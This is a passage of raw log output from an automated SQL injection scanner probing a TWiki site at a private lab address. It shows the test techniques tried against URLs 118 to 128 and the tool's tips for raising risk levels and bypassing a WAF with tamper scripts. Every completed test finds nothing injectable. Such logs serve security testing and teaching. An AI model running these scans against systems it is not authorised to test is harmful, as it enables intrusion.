[19:39:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 118:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic1?topicparent=Sandbox.WebHome
do you want to test this URL? [Y/n/q]
> Y
[19:39:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic1?topicparent=Sandbox.WebHome'
[19:39:17] [INFO] testing connection to the target URL
[19:39:18] [INFO] testing if the target URL is stable
[19:39:18] [INFO] target URL is stable
[19:39:18] [INFO] testing if GET parameter 'topicparent' is dynamic
[19:39:19] [WARNING] GET parameter 'topicparent' does not appear dynamic
[19:39:19] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[19:39:19] [INFO] testing for SQL injection on GET parameter 'topicparent'
[19:39:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:39:19] [WARNING] reflective value(s) found and filtering out
[19:39:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:39:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:39:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:39:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:39:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:39:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:39:23] [INFO] testing 'MySQL inline queries'
[19:39:24] [INFO] testing 'PostgreSQL inline queries'
[19:39:24] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:39:24] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:39:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:39:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:39:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:39:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:39:27] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:39:27] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:39:28] [INFO] testing 'Oracle AND time-based blind'
[19:39:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:39:28] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:39:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:39:54] [WARNING] GET parameter 'topicparent' is not injectable
[19:39:54] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 119:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic2?topicparent=Sandbox.WebHome
do you want to test this URL? [Y/n/q]
> Y
[19:39:54] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic2?topicparent=Sandbox.WebHome'
[19:39:54] [INFO] testing connection to the target URL
[19:39:54] [INFO] testing if the target URL is stable
[19:39:55] [INFO] target URL is stable
[19:39:55] [INFO] testing if GET parameter 'topicparent' is dynamic
[19:39:56] [WARNING] GET parameter 'topicparent' does not appear dynamic
[19:39:56] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[19:39:56] [INFO] testing for SQL injection on GET parameter 'topicparent'
[19:39:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:39:56] [WARNING] reflective value(s) found and filtering out
[19:39:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:39:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:39:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:39:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:39:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:40:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:40:00] [INFO] testing 'MySQL inline queries'
[19:40:00] [INFO] testing 'PostgreSQL inline queries'
[19:40:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:40:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:40:01] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:40:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:40:02] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:40:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:40:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:40:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:40:03] [INFO] testing 'Oracle AND time-based blind'
[19:40:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:40:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:40:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:40:16] [WARNING] GET parameter 'topicparent' is not injectable
[19:40:16] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 120:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic3?topicparent=Sandbox.WebHome
do you want to test this URL? [Y/n/q]
> Y
[19:40:16] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic3?topicparent=Sandbox.WebHome'
[19:40:16] [INFO] testing connection to the target URL
[19:40:16] [INFO] testing if the target URL is stable
[19:40:17] [INFO] target URL is stable
[19:40:17] [INFO] testing if GET parameter 'topicparent' is dynamic
[19:40:17] [WARNING] GET parameter 'topicparent' does not appear dynamic
[19:40:17] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[19:40:17] [INFO] testing for SQL injection on GET parameter 'topicparent'
[19:40:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:40:18] [WARNING] reflective value(s) found and filtering out
[19:40:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:40:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:40:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:40:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:40:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:40:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:40:21] [INFO] testing 'MySQL inline queries'
[19:40:21] [INFO] testing 'PostgreSQL inline queries'
[19:40:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:40:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:40:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:40:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:40:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:40:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:40:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:40:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:40:25] [INFO] testing 'Oracle AND time-based blind'
[19:40:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:40:25] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:40:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:40:37] [WARNING] GET parameter 'topicparent' is not injectable
[19:40:37] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 121:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic4?topicparent=Sandbox.WebHome
do you want to test this URL? [Y/n/q]
> Y
[19:40:37] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic4?topicparent=Sandbox.WebHome'
[19:40:37] [INFO] testing connection to the target URL
[19:40:37] [INFO] testing if the target URL is stable
[19:40:38] [INFO] target URL is stable
[19:40:38] [INFO] testing if GET parameter 'topicparent' is dynamic
[19:40:38] [WARNING] GET parameter 'topicparent' does not appear dynamic
[19:40:38] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[19:40:38] [INFO] testing for SQL injection on GET parameter 'topicparent'
[19:40:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:40:38] [WARNING] reflective value(s) found and filtering out
[19:40:39] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:40:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:40:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:40:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:40:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:40:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:40:41] [INFO] testing 'MySQL inline queries'
[19:40:42] [INFO] testing 'PostgreSQL inline queries'
[19:40:42] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:40:42] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:40:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:40:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:40:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:40:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:40:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:40:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:40:45] [INFO] testing 'Oracle AND time-based blind'
[19:40:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:40:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:41:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:41:18] [WARNING] GET parameter 'topicparent' is not injectable
[19:41:18] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 122:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic5?topicparent=Sandbox.WebHome
do you want to test this URL? [Y/n/q]
> Y
[19:41:18] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic5?topicparent=Sandbox.WebHome'
[19:41:18] [INFO] testing connection to the target URL
[19:41:18] [INFO] testing if the target URL is stable
[19:41:19] [INFO] target URL is stable
[19:41:19] [INFO] testing if GET parameter 'topicparent' is dynamic
[19:41:19] [WARNING] GET parameter 'topicparent' does not appear dynamic
[19:41:19] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[19:41:19] [INFO] testing for SQL injection on GET parameter 'topicparent'
[19:41:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:41:19] [WARNING] reflective value(s) found and filtering out
[19:41:20] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:41:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:41:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:41:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:41:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:41:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:41:23] [INFO] testing 'MySQL inline queries'
[19:41:23] [INFO] testing 'PostgreSQL inline queries'
[19:41:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:41:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:41:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:41:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:41:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:41:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:41:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:41:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:41:26] [INFO] testing 'Oracle AND time-based blind'
[19:41:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:41:27] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:41:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:41:47] [WARNING] GET parameter 'topicparent' is not injectable
[19:41:47] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 123:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic6?topicparent=Sandbox.WebHome
do you want to test this URL? [Y/n/q]
> Y
[19:41:47] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic6?topicparent=Sandbox.WebHome'
[19:41:47] [INFO] testing connection to the target URL
[19:41:48] [INFO] testing if the target URL is stable
[19:41:49] [INFO] target URL is stable
[19:41:49] [INFO] testing if GET parameter 'topicparent' is dynamic
[19:41:49] [WARNING] GET parameter 'topicparent' does not appear dynamic
[19:41:49] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[19:41:50] [INFO] testing for SQL injection on GET parameter 'topicparent'
[19:41:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:41:50] [WARNING] reflective value(s) found and filtering out
[19:41:54] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:41:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:41:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:41:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:42:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:42:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:42:03] [INFO] testing 'MySQL inline queries'
[19:42:04] [INFO] testing 'PostgreSQL inline queries'
[19:42:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:42:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:42:05] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:42:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:42:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:42:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:42:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:42:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:42:15] [INFO] testing 'Oracle AND time-based blind'
[19:42:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:42:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:42:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:42:27] [WARNING] GET parameter 'topicparent' is not injectable
[19:42:27] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 124:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic7?topicparent=Sandbox.WebHome
do you want to test this URL? [Y/n/q]
> Y
[19:42:27] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic7?topicparent=Sandbox.WebHome'
[19:42:27] [INFO] testing connection to the target URL
[19:42:27] [INFO] testing if the target URL is stable
[19:42:28] [INFO] target URL is stable
[19:42:28] [INFO] testing if GET parameter 'topicparent' is dynamic
[19:42:28] [WARNING] GET parameter 'topicparent' does not appear dynamic
[19:42:28] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[19:42:28] [INFO] testing for SQL injection on GET parameter 'topicparent'
[19:42:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:42:28] [WARNING] reflective value(s) found and filtering out
[19:42:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:42:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:42:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:42:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:42:31] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:42:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:42:32] [INFO] testing 'MySQL inline queries'
[19:42:32] [INFO] testing 'PostgreSQL inline queries'
[19:42:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:42:32] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:42:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:42:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:42:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:42:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:42:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:42:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:42:35] [INFO] testing 'Oracle AND time-based blind'
[19:42:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:42:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:42:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:42:48] [WARNING] GET parameter 'topicparent' is not injectable
[19:42:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 125:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic8?topicparent=Sandbox.WebHome
do you want to test this URL? [Y/n/q]
> Y
[19:42:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/TestTopic8?topicparent=Sandbox.WebHome'
[19:42:48] [INFO] testing connection to the target URL
[19:42:48] [INFO] testing if the target URL is stable
[19:42:49] [INFO] target URL is stable
[19:42:49] [INFO] testing if GET parameter 'topicparent' is dynamic
[19:42:49] [WARNING] GET parameter 'topicparent' does not appear dynamic
[19:42:49] [WARNING] heuristic (basic) test shows that GET parameter 'topicparent' might not be injectable
[19:42:49] [INFO] testing for SQL injection on GET parameter 'topicparent'
[19:42:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:42:49] [WARNING] reflective value(s) found and filtering out
[19:42:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:42:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:42:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:42:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:42:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:42:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:42:52] [INFO] testing 'MySQL inline queries'
[19:42:52] [INFO] testing 'PostgreSQL inline queries'
[19:42:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:42:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:42:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:42:53] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:42:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:42:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:42:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:42:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:42:55] [INFO] testing 'Oracle AND time-based blind'
[19:42:56] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:42:56] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:43:02] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:43:08] [WARNING] GET parameter 'topicparent' is not injectable
[19:43:08] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 126:
GET http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebHome?t=1441457353
do you want to test this URL? [Y/n/q]
> Y
[19:43:08] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Sandbox/WebHome?t=1441457353'
[19:43:08] [INFO] testing connection to the target URL
[19:43:08] [INFO] testing if the target URL is stable
[19:43:09] [INFO] target URL is stable
[19:43:09] [INFO] testing if GET parameter 't' is dynamic
[19:43:09] [WARNING] GET parameter 't' does not appear dynamic
[19:43:09] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[19:43:09] [INFO] testing for SQL injection on GET parameter 't'
[19:43:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:43:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:43:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:43:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:43:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:43:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:43:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:43:12] [INFO] testing 'MySQL inline queries'
[19:43:12] [INFO] testing 'PostgreSQL inline queries'
[19:43:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:43:13] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:43:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:43:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:43:14] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:43:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:43:15] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:43:15] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:43:16] [INFO] testing 'Oracle AND time-based blind'
[19:43:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:43:16] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:43:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:43:28] [WARNING] GET parameter 't' is not injectable
[19:43:28] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 127:
GET http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text&regex=on&search=Web *Home[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[19:43:28] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Sandbox/SearchResult?scope=text&regex=on&search=Web *Home[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[19:43:28] [INFO] testing connection to the target URL
[19:43:28] [INFO] testing if the target URL is stable
[19:43:29] [INFO] target URL is stable
[19:43:29] [INFO] testing if URI parameter '#1*' is dynamic
[19:43:29] [WARNING] URI parameter '#1*' does not appear dynamic
[19:43:29] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[19:43:29] [INFO] testing for SQL injection on URI parameter '#1*'
[19:43:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:43:29] [WARNING] reflective value(s) found and filtering out
[19:43:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[19:43:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[19:43:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[19:43:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[19:43:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[19:43:33] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[19:43:33] [INFO] testing 'MySQL inline queries'
[19:43:33] [INFO] testing 'PostgreSQL inline queries'
[19:43:33] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[19:43:33] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[19:43:34] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[19:43:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[19:43:34] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[19:43:35] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:43:35] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[19:43:36] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[19:43:36] [INFO] testing 'Oracle AND time-based blind'
[19:43:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[19:43:37] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[19:43:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:43:57] [WARNING] URI parameter '#1*' is not injectable
[19:43:57] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 128:
GET http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?skin=print
do you want to test this URL? [Y/n/q]
> Y
[19:43:57] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Sandbox/WebHome?skin=print'
[19:43:57] [INFO] testing connection to the target URL
[19:43:57] [INFO] testing if the target URL is stable
[19:43:58] [INFO] target URL is stable
[19:43:58] [INFO] testing if GET parameter 'skin' is dynamic
[19:43:58] [INFO] confirming that GET parameter 'skin' is dynamic
[19:43:58] [INFO] GET parameter 'skin' is dynamic
[19:43:58] [INFO] heuristics detected web page charset 'ascii'
[19:43:58] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
